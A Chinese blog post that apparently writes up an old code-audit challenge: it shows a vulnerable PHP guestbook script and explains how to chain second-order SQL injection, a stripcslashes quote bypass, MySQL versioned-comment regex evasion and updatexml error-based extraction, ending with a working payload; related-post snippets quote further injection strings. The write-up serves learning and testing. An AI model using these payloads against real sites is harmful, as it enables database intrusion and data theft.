mysql报错注入_从二次注入,到报错注入注入,再到正则表达式绕过

最新推荐文章于 2024-03-11 14:30:00 发布
最新推荐文章于 2024-03-11 14:30:00 发布
阅读量119 收藏
点赞数
文章标签: mysql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33037813/article/details/112349723
版权

0x01前言

回顾了下以前的代码审计

三个白帽,很经典

现在估计都没有了吧。

0x02 分析

<?php include 'db.inc.php';foreach(array('_GET','_POST','_COOKIE') as $key){foreach($$key as $k => $v){if(is_array($v)){
            errorBox("hello,sangebaimao!");
        }else{
            $k[0] !='_'?$$k = addslashes($v):$$k = "";
        }
    }
}function filter($str){
    $rstr = "";for($i=0;$i        if(ord($str[$i])>31 && ord($str[$i])<127){
            $rstr = $rstr.$str[$i];
        }
    }
    $rstr = str_replace('\'','',$rstr);return $rstr;
}if(!empty($message)){if(preg_match("/\b(select|insert|update|delete)\b/i",$message)){die("hello,sangebaimao!");
    }if(filter($message) !== $message){die("hello,sangebaimao!");
    }
    $sql="insert guestbook(`message`) value('$message');";
    mysql_query($sql);
    $sql = "select * from guestbook order by id limit 0,5;";
    $result = mysql_query($sql);if($result){while($row = mysql_fetch_array($result)){
            $id = $row['id'];
            $message = $row['message'];echo "|$id|=>|$message|
";
        }
    }
    $message = stripcslashes($message);
    $sql = "delete from guestbook where id=$id or message ='$message';";if(!mysql_query($sql)){print(mysql_error());
        $sql = "delete from guestbook where id=$id";
        mysql_query($sql);
    };
}?>

源码如题, 在我本地间的构造了一个数据库,然后就运行了。

  • 不难看出,有两个过滤的地方,一个是filter函数,另外一个是正则绕过。这是对输入的绕过。

  • 代码的逻辑也很简单,插入,显示,取出,删除。

  • 我们插入的数据,进入第二次的查询,这就存在二次注入了。二次注入的逻辑也很简单,只要插入的数据经过过滤之后可以正常查询就好了。

  • 然后就是回显的问题了,有一个print(mysql_error());那么就可以直接使用报错注入了

以上是对程序的简单分析。

0x03 绕过

  1. 关于单引号的绕过,这个地方比较特别,程序中有一个 message=stripcslashes(message);关于这个函数的作用可以简要要说明一下:

    反引用一个使用 [addcslashes()](https://www.php.net/manual/zh/function.addcslashes.php) 转义的字符串

    返回反转义后的字符串。可识别类似 C 语言的 *\n*,*\r*,... 八进制以及十六进制的描述。

    stripcslashes('H\xaello') == 'H'.chr(0xAE).'llo'

    既然可以转义,直接让他来转义\x27  就可以使用单引号了。

  2. 关于正则的绕过

    可以看出正则表达式中有\b

    先来看看\b的作用,\b的作用是匹配单词的边界。所谓的单词的边界就是特殊符号的边界。

    绕过的思路就来了,假设我们想使用select 在select前后加点单词就可以了。

    这里提一个mysql的tips

    /*!*/ 只在mysql中有用,在别的数据库中这只是注释,但是在mysql,/*!select 1*/可以成功执行,在语句前可以加上5位数字,代表版本号,表示只有在大于该版本的mysql中不作为注释.

    mysql> select version();
    +-----------+
    | version() |
    +-----------+
    | 5.7.9-log |
    +-----------+
    1 row in set (0.00 sec)

    mysql> select /*!50709version()*/;
    +-----------+
    | version() |
    +-----------+
    | 5.7.9-log |
    +-----------+
    1 row in set (0.00 sec)

  3. 关于报错注入

UpdateXML(xml_target, xpath_expr, new_xml)
updatexml函数有三个参数,作用是xml替换,把xml_target中被xpath_expr匹配到的部分使用new_xml替换

这个报错注入的原理是利用updatexml的参数错误,首先不能有语法错误,要不然注入的语句根本无法执行,语法正确后,先去执行concat(0x27,(/*!00000select version()*/)),得到'5.5.42-log,作为第二个参数传入updatexml函数中,而updatexml第二个参数为xml的匹配表达式,单引号为非法字符,因此报错,输出错误内容'5.5.42-log, 因此得到了你想要得到的数据

payload

?message=aaa\x27 and updatexml(0,concat(0x27,(/*!00000select version()*/)),0)%23

1fb46aed15e4e1e13ad6bb1077222ac4.png

6c049c25ca1feaa418c6c77bb9dec266.png

克莱儿儿儿
关注
二次注入报错注入简单了解
现代鲁滨逊的博客
12-14 354
文章目录二次注入报错注入wp 二次注入 报错注入 十种MySQL报错注入 wp test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)# password=aaa&email=bbb&username=a"||(updatexml(0x7e,concat(7,(select(group
mysql 注入 waf_项目实战 | 报错SQL注入绕过WAF
weixin_33040687的博客
02-07 334
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基于布尔的查...
SQL注入(报错,注入绕过
m0_62886641的博客
04-23 341
复习笔记,欢迎大佬指正
二次注入报错注入结合的一次Sql注入
恒Keep毅
12-07 3071
文章目录前言:代码审计联合注入?NO同义词绕过?不同页面进行判断?写脚本爆破Flag 前言: 该文章首发于https://sleepymonster.cn 这是一道2021年暨南大学新生赛决赛的题。 当时的战况是我在赌一把,如果我做出来了,我就能拿到二等奖 可惜网络不给力,在脚本没变的情况下,第二次才跑出来。 但是已经超时5分钟了,所以等于我一道题没做出来。 (签到题后面才发出来的,每人后面都做签到题)我赌了一把,失败了???? 代码审计 比赛时早上9点开始的,有二道题。 继续看看描述吧~(里面的Hint
mysql报错注入_项目实战 | 报错SQL注入绕过WAF
weixin_33560311的博客
01-01 278
文章来源:安译Sec报错的存在一个有趣的点:http://domain.com/xxx/news.php?id=xxx打开URL时,遇到了MySQL错误。Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27访问端点时出现MySQL错误我们知道可以执行一些基...
正则表达式绕过案例
lin152235的博客
07-21 1122
正则表达式进行绕过,如果要绕过你需要在from前面不要出现不是单词边界,手动加入会报语法错误,所以这里需要考虑mysql中的科学计数法1e1来进行注入绕过,但是还是会出现一个问题就是使用科学计数法来进行查询会占一列,但是前面说到这个users中只有3列超过就会报错,所以直接使用group_concat来进行绕过,因为只能显示3列所以,我们将1,group_concat(…由orderby可以知道这个表一共有3列,那么我们就可以查看2,3列;可以看的出来,第二列存储的是登录密码,第三列是密码。...
正则表达式以及相关案例绕过复现
CYLK1987310466的博客
07-23 567
正则表达式的学习
正则表达式密码策略与正则回溯机制绕过
Miracle_ze的博客
07-20 354
正则表达式与回溯绕过机制
concat mysql sql注入_sql注入总结(一)--2018自我整理
weixin_42516040的博客
12-29 279
SQL注入总结前言:本文和之后的总结都是进行总结,详细实现过程细节可能不会写出来~所有sql语句均是mysql数据库的,其他数据库可能有些函数不同,但是方法大致相同0x00 SQL注入原理:SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中。可能存在注入的地方有:登陆页面,搜索,获取HTTP头的信息(client-ip , x-forward-of),订单处理(二次注...
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1621
这是我自己对于sql注入的部分ctf题型的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第二种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
报错注入绕过sql注入检测机制的一点思路
坚持硬核
01-28 562
相关的sql函数说明: rand() 用于产生一个0到1之间的随机数 floor() 向下取整 floor(rand()) 得到的值永远为0 floor(rand()*2) 得到的值可能为1可能为0 select floor(rand()*2) from 有很多数据的表名 有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现 但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110 select co
记一次团队成员绕过waf来cms报错注入
qq_29437513的博客
05-30 719
​ 记一次团队成员绕过waf来cms报错注入 作者:ECHO: 前言: 最近事多,随便抽个来写写,团队的某个大哥要打hvv,丢了个mssql的站,说是有waf,想搞搞数据和shell 无图,通过fuzz,发现逻辑运算1-if()这种是可以用的,, ​ 但不知道sql语句怎么构造,,在后面加了一堆语句后,报了个insert语句的错,后面就丢给up哥来闭合了, ok,成功闭合,闭合语句:a’,1,1,1,1)–+ 能注了,up哥yyds! 然后就是:Payload三个探针: 不用conv
SQL靶场练习之二(空格绕过报错注入
Lorezon的博客
01-16 745
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
漏洞复现篇——二次渲染绕过(upload-labs---16关)
爱国小白帽
02-19 5213
实验环境: PHPstudy Burp Suite抓包软件 | 下载 | 教程 | upload-labs-master上传漏洞靶场 火狐浏览器 第十六关 1、创建PHP文件 源码: <?php $f= fopen ("shell.php","w") ; fputs ($f,'<?php phpinfo();?>'); ?> 2、选择创建好的PHP文件 3、再...
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
最新发布
Karka_的博客
03-11 1032
🏆今日学习目标:🍀学习了解sql注入漏洞✅创作者:贤鱼⏰预计时间:35分钟具体详细介绍在专栏中有单独介绍,可以查看只有了解才能注入
SQL注入实战:绕过操作
ting_liang的博客
01-27 2810
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
生命在于学习——SQL注入绕过
热门推荐
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4715
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
SQL注入漏洞-绕过
HacHunter的博客
03-08 6823
绕过条件过滤 掌握了基本的注入手段。但是随着网站开发人员的安全意识的提高,纷纷使用了各种防注入的手段。最简单的就是条件过滤了。条件过滤,顾名思义就是黑名单机制,过滤掉符合条件的语句。因此我们要想办法绕过过滤,用其他方式来实现注入绕过伪静态 伪静态:伪静态通俗点说就是假的静态页面,也就是通过各种技术手段,让动态页面的URL看上去和静态页面的一样。 .htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。 我们这里利用.htaccess文件,配置重写引擎,来实现伪静
突破MySQL注入防御:绕过技巧与实操演示
MySQL注入绕过技术是一种高级的黑客攻击手段,针对那些依赖于关键词或函数过滤来防止SQL注入的数据库系统。演讲者Johannes Dahse来自德国Bochum,是一位IT安全领域的学生,专注于web安全研究,并且已经开发了PHP源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值